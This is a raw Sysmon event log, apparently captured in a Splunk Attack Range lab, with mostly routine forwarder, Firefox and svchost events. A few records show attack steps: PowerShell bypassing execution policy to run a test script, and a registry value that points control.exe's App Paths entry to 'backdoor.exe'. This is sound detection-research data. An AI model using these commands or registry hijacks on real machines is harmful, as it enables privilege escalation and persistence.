CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "-Command" "if((Get-ExecutionPolicy ) -ne 'AllSigned') { Set-ExecutionPolicy -Scope Process Bypass }; & 'C:\Temp\test\sd2.ps1'"C:\Temp\test\ATTACKRANGE\bob{466BC892-32CE-60E8-37BC-780000000000}0x78bc373MediumMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\explorer.exeC:\Windows\Explorer.EXE 23542300x8000000000000000810598Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:03.886{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A3729C1BC5018BFBDCA51583F32AB161,SHA256=CBD631EBA80B7D4B9CC46053C6F52CEC66786E058F5A13AF165F0DB89C45B562,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055191Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:03.741{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=B64711157489F03713EC9AFE375F7063,SHA256=18A315AAD2AFF9FAF3CE9316D72F966D019FCF6FB5AEBC2198E9AF8386B3BD02,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055190Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:03.741{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=547CE19615E419F2404430ADC606E1AE,SHA256=56E1B94B77CFD6E52C260A96B759A476D2F3EDECAD9A85631987898548863DBA,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001055189Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:03.626{466BC892-02AF-60E8-0D00-00000000CF01}900696C:\Windows\system32\svchost.exe{466BC892-02B0-60E8-1600-00000000CF01}1304C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+b4d7|c:\windows\system32\rpcss.dll+8257|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001055188Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:03.273{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=EEAB2E5EDCF0EB0B2069AAF17079EEC3,SHA256=037DB6BFE7607BE899B5FCD090D997095278753904E7E648530F2385CF1750E3,IMPHASH=00000000000000000000000000000000falsetrue 13241300x80000000000000001055187Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 08:09:03.095{466BC892-F89E-60EB-077E-00000000CF01}3804C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-2333072374-3391925831-3197092227-1112\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\control.exe\(Default)c:\temp\test\backdoor.exe 23542300x80000000000000001055192Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:04.756{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A69199328C0EE329D92C6F1B95922534,SHA256=E6527D74E953DF33BD1FA3E6A6058745FEBDF2DFB774AC6661AC7A6FA9C095A3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810599Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:04.899{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C546DD3D13D08D501970C28F79457785,SHA256=6FC63EC02FBACD5780D50B539DE18D844480FE492C9E32A03C5BEC15ED81BE91,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810600Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:05.901{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=34A72A369C7A4ED514F1711E00BDE048,SHA256=16C0A411D00477C427E368808F186115819480A44A6ABA01412C3B4C5DCFA350,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055193Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:05.771{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FAF2ACC4A19AE8E3579DC6E09606D03B,SHA256=2E65E078086658049F3E8DB337ABE245C5F6A63B931279CEE916974B79FACE7A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810602Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:06.948{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=907C888631C32AD3DA62DD4CF02571FD,SHA256=BECD1CD3B665CB1FB27CBA339D5A1A4370D83BF3CDF68240CF2580D3E688E4AD,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000810601Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:05.285{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57480-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001055201Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:06.811{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=DEE4002BB8031A65277DB817F9B91D6F,SHA256=EEF53800920962243D14ADBDDFCE983D940D507BAC4861A993A33B904CBF5108,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055200Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:06.774{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D21FCF9D7C3800F1A7A85F6C36F29DDD,SHA256=D1ECC8E1A8A79B4552B1BEB6DADBD3F4C726B1F1FB8E96FB574A987D2CC9B35B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055199Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:06.555{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\storage\default\https+++twitter.com\idb\1046228012scyn.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001055198Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:06.508{466BC892-3462-60E8-100C-00000000CF01}89445812C:\Program Files\Mozilla Firefox\firefox.exe{466BC892-3465-60E8-160C-00000000CF01}6264C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+3e7611|C:\Program Files\Mozilla Firefox\xul.dll+121488e|C:\Program Files\Mozilla Firefox\xul.dll+140c86d|C:\Program Files\Mozilla Firefox\xul.dll+1223271|C:\Program Files\Mozilla Firefox\xul.dll+12192da|C:\Program Files\Mozilla Firefox\xul.dll+2208260|C:\Program Files\Mozilla Firefox\xul.dll+221acda|C:\Program Files\Mozilla Firefox\xul.dll+2201919|C:\Program Files\Mozilla Firefox\xul.dll+2201645|C:\Program Files\Mozilla Firefox\xul.dll+2205190|C:\Program Files\Mozilla Firefox\xul.dll+2216ecd|C:\Program Files\Mozilla Firefox\xul.dll+22213c8|C:\Program Files\Mozilla Firefox\xul.dll+2220a14|C:\Program Files\Mozilla Firefox\xul.dll+220bbd6|C:\Program Files\Mozilla Firefox\xul.dll+40976|C:\Program Files\Mozilla Firefox\xul.dll+3f85a|C:\Program Files\Mozilla Firefox\xul.dll+120351f|C:\Program Files\Mozilla Firefox\xul.dll+3f65e|C:\Program Files\Mozilla Firefox\xul.dll+dabd27|C:\Program Files\Mozilla Firefox\nss3.dll+fac5a|C:\Program Files\Mozilla Firefox\nss3.dll+ee441|C:\Windows\System32\ucrtbase.dll+1fb80 10341000x80000000000000001055197Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:06.493{466BC892-3462-60E8-100C-00000000CF01}89445812C:\Program Files\Mozilla Firefox\firefox.exe{466BC892-3465-60E8-160C-00000000CF01}6264C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+3e7611|C:\Program Files\Mozilla Firefox\xul.dll+121488e|C:\Program Files\Mozilla Firefox\xul.dll+140c86d|C:\Program Files\Mozilla Firefox\xul.dll+1223271|C:\Program Files\Mozilla Firefox\xul.dll+12192da|C:\Program Files\Mozilla Firefox\xul.dll+2208260|C:\Program Files\Mozilla Firefox\xul.dll+221acda|C:\Program Files\Mozilla Firefox\xul.dll+2201919|C:\Program Files\Mozilla Firefox\xul.dll+2201645|C:\Program Files\Mozilla Firefox\xul.dll+2205190|C:\Program Files\Mozilla Firefox\xul.dll+2216ecd|C:\Program Files\Mozilla Firefox\xul.dll+22213c8|C:\Program Files\Mozilla Firefox\xul.dll+2220a14|C:\Program Files\Mozilla Firefox\xul.dll+220bbd6|C:\Program Files\Mozilla Firefox\xul.dll+40976|C:\Program Files\Mozilla Firefox\xul.dll+3f85a|C:\Program Files\Mozilla Firefox\xul.dll+120351f|C:\Program Files\Mozilla Firefox\xul.dll+3f65e|C:\Program Files\Mozilla Firefox\xul.dll+dabd27|C:\Program Files\Mozilla Firefox\nss3.dll+fac5a|C:\Program Files\Mozilla Firefox\nss3.dll+ee441|C:\Windows\System32\ucrtbase.dll+1fb80 18141800x80000000000000001055196Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-ConnectPipe2021-07-12 08:09:06.490{466BC892-3462-60E8-100C-00000000CF01}8944\chrome.6264.1218.137029583C:\Program Files\Mozilla Firefox\firefox.exe 17141700x80000000000000001055195Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-CreatePipe2021-07-12 08:09:06.490{466BC892-3465-60E8-160C-00000000CF01}6264\chrome.6264.1218.137029583C:\Program Files\Mozilla Firefox\firefox.exe 23542300x80000000000000001055194Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:06.193{466BC892-F89E-60EB-077E-00000000CF01}3804ATTACKRANGE\bobC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\bob\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810603Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:07.995{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3B12A024DF9839401B00CBB220162836,SHA256=534D523C6317D8DED41F8728D80251577309869EAE7BA76B3B16322A5A65C1E1,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001055205Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:59.615{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local61989-false10.0.1.12-8000- 354300x80000000000000001055204Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:59.347{466BC892-02AF-60E8-0F00-00000000CF01}360C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse195.78.54.188-28137-false10.0.1.14win-dc-890.attackrange.local3389ms-wbt-server 23542300x80000000000000001055203Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:07.792{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=55E13B1D2458A62EB076F60BEBD03EF9,SHA256=66B6CA05C2FDE904675413D24E453BE08BC58259444FB11649C529F19225FCF5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055202Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:07.757{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=44E3B8C0830AA5AB39F241982BAF0A19,SHA256=6DE8CB43E2BAA40A1B2176D82E1270D6CEB1678F16B8F57C79D6FE9ADC702FFF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055217Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:08.809{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6A1BF01F15590085960385DB96B78ECD,SHA256=F8E22D24689BCCB0889E97BF00F3631E1D790B79E7391D7D5BFF7BA33A95DB71,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055216Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:08.593{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=F3D4FFDB08A42E245718FD237DBDA304,SHA256=64134235CB61AEBC2EA6C3AC36A08CB01775B2C826D6079AB0A09D4E1E6D7F27,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055215Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:08.593{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=2CC4F840883F7C336D29BB52EC77F2A1,SHA256=5936891BF97AF294EFEF43026D23F4FD5F31DE2587AC40C1CA90E5B83475FA82,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055214Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:08.593{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=E14F11C6EC3AF781513EE2E40CC6F187,SHA256=E34F06EB3306C48013E59CA49C2F4E4C85B17D9B0BD4DEE4A4328523461377F2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055213Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:08.593{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=DCBEEB312CD3BCC3E5922DB8C9DDBA9C,SHA256=3B7AC5E9F36FC4A5E0E376800B780FEAFA1F7B67D0C2A50CE801DFFCAC5E69C8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055212Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:08.593{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=F3440D538FB575DED9BF702B26C10E4F,SHA256=A54E66A4B79434266BE867DFA40B83F334DD5A8C23550AED0DA57E5D778F8281,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055211Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:08.593{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=A13B11B186E84E6D2A8B467D79ADA732,SHA256=A26FC5E9EB16F63BAED669F04983E18B1CCDEEDD86E2C74DFA56C1422314B05C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055210Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:08.593{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=C8CD69A52384E04B0BC5C4ED65093A47,SHA256=A32D08B57057CD5A5EACF8803CCF0B8E6A8C2CAAA2069160DAD1C02AB1749776,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055209Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:08.593{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=8FEBDEDE296490F89A03B4E4032097C1,SHA256=BF9ED3DE3395829767ECC44650DA0B1458D3C8192D05E1F280F75A9565FEF99B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055208Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:08.592{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=21A7BA611FF802A6EF7A1483C7955EAC,SHA256=C53A766A7B5D1D91DF93454A61EBEF5D5FFB595B99C5B874FC004F1C38D808BD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055207Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:08.590{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=EB8449BB6F8754A1059BC2D4A88441CE,SHA256=F6456A9BDC85A4E99560F130BBFCCC4F3EFEDEB00DCBC157217FA280E6A0962F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055206Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:08.589{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=01BF6DECFCB3DADE88253728373E56FA,SHA256=1FC10D9712B80ED03722FBB9602785FA1B9879426D552EFB809A3EA68D797E30,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055218Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:09.824{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C1781185A5792BB1777B090A5424580E,SHA256=2F42C051EF4A920E4DDEFC27FF0B58A47F21DB5D3FE9C370FB38D8388C400FF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810604Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:09.042{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0026AFC9415ED4E81FF73C0C99706A05,SHA256=5C1AF4F75B805D3268F27A0203A11999D9F9A604111A4AC11BA1607EDE10CAA9,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001055233Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:10.954{466BC892-02AF-60E8-0D00-00000000CF01}9005708C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+f526|c:\windows\system32\rpcss.dll+121ba|c:\windows\system32\rpcss.dll+740c|C:\Windows\System32\RPCRT4.dll+64b8c|C:\Windows\System32\RPCRT4.dll+64979|C:\Windows\System32\RPCRT4.dll+64793|C:\Windows\System32\RPCRT4.dll+3f7d4|C:\Windows\System32\RPCRT4.dll+3fc51|C:\Windows\System32\RPCRT4.dll+1c39d|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055232Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:10.954{466BC892-02AF-60E8-0D00-00000000CF01}9005708C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+f526|c:\windows\system32\rpcss.dll+121ba|c:\windows\system32\rpcss.dll+740c|C:\Windows\System32\RPCRT4.dll+64b8c|C:\Windows\System32\RPCRT4.dll+64979|C:\Windows\System32\RPCRT4.dll+64793|C:\Windows\System32\RPCRT4.dll+3f7d4|C:\Windows\System32\RPCRT4.dll+3fc51|C:\Windows\System32\RPCRT4.dll+1c39d|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055231Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:10.954{466BC892-02AF-60E8-0D00-00000000CF01}9005708C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+f526|c:\windows\system32\rpcss.dll+121ba|c:\windows\system32\rpcss.dll+740c|C:\Windows\System32\RPCRT4.dll+64b8c|C:\Windows\System32\RPCRT4.dll+64979|C:\Windows\System32\RPCRT4.dll+64793|C:\Windows\System32\RPCRT4.dll+3f7d4|C:\Windows\System32\RPCRT4.dll+3fc51|C:\Windows\System32\RPCRT4.dll+1c39d|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055230Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:10.954{466BC892-02AF-60E8-0D00-00000000CF01}9005708C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+f526|c:\windows\system32\rpcss.dll+121ba|c:\windows\system32\rpcss.dll+740c|C:\Windows\System32\RPCRT4.dll+64b8c|C:\Windows\System32\RPCRT4.dll+64979|C:\Windows\System32\RPCRT4.dll+64793|C:\Windows\System32\RPCRT4.dll+3f7d4|C:\Windows\System32\RPCRT4.dll+3fc51|C:\Windows\System32\RPCRT4.dll+1c39d|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055229Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 